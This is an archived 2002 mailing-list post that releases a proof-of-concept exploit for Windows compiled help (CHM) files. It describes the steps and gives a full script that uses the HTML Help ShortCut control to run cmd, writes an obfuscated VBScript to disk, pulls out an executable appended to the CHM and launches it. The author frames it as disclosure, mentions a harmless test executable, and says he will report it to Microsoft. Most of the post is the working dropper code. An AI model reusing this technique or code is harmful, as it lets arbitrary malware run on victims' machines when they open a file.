> technical note: the possibility is excellent to repeat the entire
> process above directly inside the *.chm file and drop an *.exe from
> within the *.chm into the same Temporary Internet File. Using our
> Guninski scripting to determine the location of the *.chm and write
> that to the link parameter within it: value="'+path+'\\malware
> [1].exe"> and execute it.
I made a proof of concept on a chm exe dropper a while back,
I guess nows a good enough time as any to release it...that
command execution thing in a chm is really dangerous. A chm
is about the same as running an exe right now.
note this works from Internet Temp files directory as well, all
someone has to do is choose the open option when they click a link
to a chm file, and they are done.
I am not going to distribute a prepackaged example, no good could
come of that.below is the html script that is capable of it. It is
a sufficient enough process to assemble the package as to keep it
out of the hands of the kids.
I will email MS with a link to a working sample for them to examine.
also rember the mechanism for this exploit was exposed about a year
ago(?) so I am sure other things have been done with this and it is
still a viable hole.
-------------------------------------------------
flow of events
-------------------------------------------------
1) chm opens
a) determines absolute path current folder
b) determines parent chm name (in case cached changes name)
c) detects winNT or win98 to work on both
2) chm name is used to auto generate vbs script data
abs path is used to auto generate html object data
script writes dynamically generated content to window
3) first object activated programatically....vbs script is echoed
into existance into same folder as parent chm file
4) waits 1sec then activates echoed.vbs file...this vbs file
reads the parent .chm and extracts a hello world exe that is
appended onto the chm file.
5) after exe is written to disk vbs script then activates it
-------------------------------------------------------------
script below
-------------------------------------------------------------
msg='<center><h1> Holy Mackeral Batman !<br><br> I think he hath done it! <br><br> : )\\</h1></center>'
function getChmAbsPath(){
t=unescape(location.href)
return t.substring(t.indexOf(":",4)+1,t.lastIndexOf("\\")+1)
}
function getChmName(){
l=unescape(location.href)
chmName=l.substring(l.lastIndexOf("\\")+1,l.lastIndexOf(":")-1)
t='Chr(92)+'
for(i=0;i<chmName.length;i++){
t+= 'Chr(' + chmName.charCodeAt(i) + ')+'
}
return t.substring(0,t.length-1);
}
function getInterpreter(){
if(navigator.userAgent.indexOf('NT') > 0){
return 'cmd';
}else{
return 'command';
}
}
vbs='fso=Chr(83)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(105)+Chr(110)+Chr(103)+Chr(46)+Chr(70)+Chr(105)+Chr(108)+Chr(101)+Chr(83)+Chr(121)+Chr(115)+Chr(116)+Chr(101)+Chr(109)+Chr(111)+Chr(98)+Chr(106)+Chr(101)+Chr(99)+Chr(116):'+
'wsc=Chr(119)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108):'+
'exename=Chr(92)+Chr(101)+Chr(120)+Chr(116)+Chr(114)+Chr(97)+Chr(99)+Chr(116)+Chr(46)+Chr(101)+Chr(120)+Chr(101):'+
'set i=createobject(fso):'+
'set o=createobject(fso):'+
'set w=createobject(wsc):'+
'pf=i.GetParentFolderName(WSCript.ScriptFullName):'+
'infile=pf+' + getChmName() + ':'+
'outfile=pf+exename:'+
'OFFSET=XXXXXXX:'+
'Set ii=i.OpenTextFile(infile):'+
'Set oo=o.OpenTextFile(outfile,2,True):'+
'ii.Read OFFSET:'+
'While Not ii.AtEndOfStream:'+
'oo.Write Chr(Asc(ii.Read(1))):'+
'Wend:ii.close:oo.close:'+
'w.Run chr(34)+outfile+chr(34)'
hit='<OBJECT id=shortcut^ type="application/x-oleobject" '+
'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" '+
'codebase="hhctrl.ocx\#Version=4,72,8252,0" width=100 '+
'height=100><PARAM name="Command" value="ShortCut"> '+
'<PARAM name="Text" value="Text: "> '+
'<PARAM name="Item1" value=\',*\'> '+
'<PARAM name="Item2" value="273,1,1"></OBJECT> '
scriptPath = getChmAbsPath() + 'echoed.vbs'
cmd=new Array
cmd[1]= getInterpreter() + ',/c echo ' + vbs + ' > "' + scriptPath + '"'
cmd[2]='wscript,"' + scriptPath + '"'
function replace(h,i,c){
h = h.split('^').join(i).split('*').join(c)
return h
}
hit1=replace(hit,1,cmd[1])
hit2=replace(hit,2,cmd[2])
document.write(hit1+hit2+msg)
shortcut1.Click()
setTimeout("shortcut2.Click()",1000)
__________________________________________________________________________
http://geocities.com/dzzie
__________________________________________________________________________
This archive was generated by hypermail 2b30 : Sun Feb 10 2002 - 00:35:44 PST